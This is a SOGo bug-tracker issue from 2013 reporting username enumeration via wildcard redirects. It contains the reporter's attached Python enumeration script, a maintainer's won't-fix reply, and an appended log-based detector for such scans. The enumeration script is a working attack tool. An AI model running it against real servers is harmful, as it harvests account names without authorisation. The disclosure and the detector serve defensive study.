View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0002382 | SOGo | Web General | public | 2013-07-29 14:39 | 2013-07-29 14:51 |
Reporter | ispoljaric | Assigned To | |||
Priority | normal | Severity | minor | Reproducibility | always |
Status | closed | Resolution | won't fix | ||
Product Version | 2.0.6 | ||||
Summary | 0002382: Information leak of LDAP entries. | ||||
Description | It is possible to force a redirect to any account that can log in to SOGo. The malicious user needs to be authenticated to get access to the URL manipulation. | ||||
Steps To Reproduce | In my example, the URL to be manipulated is http://sogo.labos.nimium.local/SOGo/so/ . Basically, you use the redirect that expands the wildcard request. After that, we get the message: but still the username was leaked. | ||||
Additional Information | There is a Python script attached that extracts a partial or full list of users on SOGo. Usage: python sogo_ldap_injection.py 'username' 'password' 'http://sogo.labos.nimium.local/SOGo/' | ||||
Tags | No tags attached. | ||||
2013-07-29 14:39 ispoljaric: attached sogo_ldap_injection.py (783 bytes)

```python
#!/usr/local/bin/python
# Python 2 (print statement syntax), as attached to the report.
import requests
import string

def login(uname, password, url):
    # Authenticate against SOGo and return the session cookies.
    return requests.post(url + '/connect',
                         data={'userName': uname, 'password': password}).cookies

def extract(url, cookie):
    for i in string.ascii_lowercase:
        # Request <letter>*/view; SOGo expands the wildcard and redirects,
        # so the final URL no longer contains '*' when a user matched.
        c = requests.get(url + i + '*/view', cookies=cookie).url
        if '*' not in c:
            print c.split('/')[c.split('/').index('so') + 1]
            # If we want full uids, we just need to make it recursive
            # Uncomment the next line if you want really really slow extraction of everything
            #extract(url+i,cookie)

if __name__ == '__main__':
    import sys
    session = login(sys.argv[1], sys.argv[2], sys.argv[3])
    extract(sys.argv[3] + '/so/', session)
```
2013-07-29 14:51 ludovic (note 0005774):

This isn't a problem in itself. If you are authenticated, you can very well simply list all valid users when you want to share your calendar or subscribe to one. Your script shows nothing more than what SOGo already exposes, for a reason.
Date Modified | Username | Field | Change |
---|---|---|---|
2013-07-29 14:39 | ispoljaric | New Issue | |
2013-07-29 14:39 | ispoljaric | File Added: sogo_ldap_injection.py | |
2013-07-29 14:51 | ludovic | Note Added: 0005774 | |
2013-07-29 14:51 | ludovic | Status | new => closed |
2013-07-29 14:51 | ludovic | Resolution | open => won't fix |
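A defender-side check, added here and not part of the report or of SOGo: the attached script issues one `<letter>*/view` request per letter under /SOGo/so/ and reads the username out of the redirect, so a burst of distinct wildcard lookups from one client in the web server's access log is the pattern an operator can watch for. The log lines, client addresses, users, timestamps, statuses and the threshold below are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined-log style. The host and paths follow the
# report; the client addresses, users, timestamps and statuses are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jul/2013:14:30:01 +0200] "GET /SOGo/so/alice/Calendar/view HTTP/1.1" 200 5120
10.0.0.9 - - [29/Jul/2013:14:30:02 +0200] "GET /SOGo/so/a*/view HTTP/1.1" 302 0
10.0.0.9 - - [29/Jul/2013:14:30:02 +0200] "GET /SOGo/so/b*/view HTTP/1.1" 302 0
10.0.0.9 - - [29/Jul/2013:14:30:03 +0200] "GET /SOGo/so/c*/view HTTP/1.1" 404 0
10.0.0.9 - - [29/Jul/2013:14:30:03 +0200] "GET /SOGo/so/d*/view HTTP/1.1" 302 0
10.0.0.5 - - [29/Jul/2013:14:30:04 +0200] "GET /SOGo/so/alice/Mail/view HTTP/1.1" 200 2048
"""

# client, method, path, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})')
# user segment directly under /SOGo/so/ that contains a '*' (SOGo expands it and
# redirects to the matching account URL, which is what leaks the name)
WILDCARD_RE = re.compile(r"^/SOGo/so/([^/]*\*[^/]*)/")


def wildcard_requests(log_text):
    """Return (client, wildcard_segment, status) for every wildcard user lookup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        w = WILDCARD_RE.match(path)
        if w:
            hits.append((client, w.group(1), int(status)))
    return hits


def flag_enumeration(log_text, threshold=3):
    """Map each client that issued at least `threshold` distinct wildcard lookups
    to the sorted list of those lookups. The attached script issues 26 per pass,
    so a low threshold already separates it from an occasional manual typo."""
    seen = defaultdict(set)
    for client, segment, _status in wildcard_requests(log_text):
        seen[client].add(segment)
    return {c: sorted(s) for c, s in seen.items() if len(s) >= threshold}


if __name__ == "__main__":
    for client, segments in flag_enumeration(SAMPLE_LOG).items():
        print(f"{client}: {len(segments)} distinct wildcard lookups: {', '.join(segments)}")
```

On a real deployment, key the count on the authenticated SOGo session or username as well as the client address, since the report notes the lookups only work for a logged-in account.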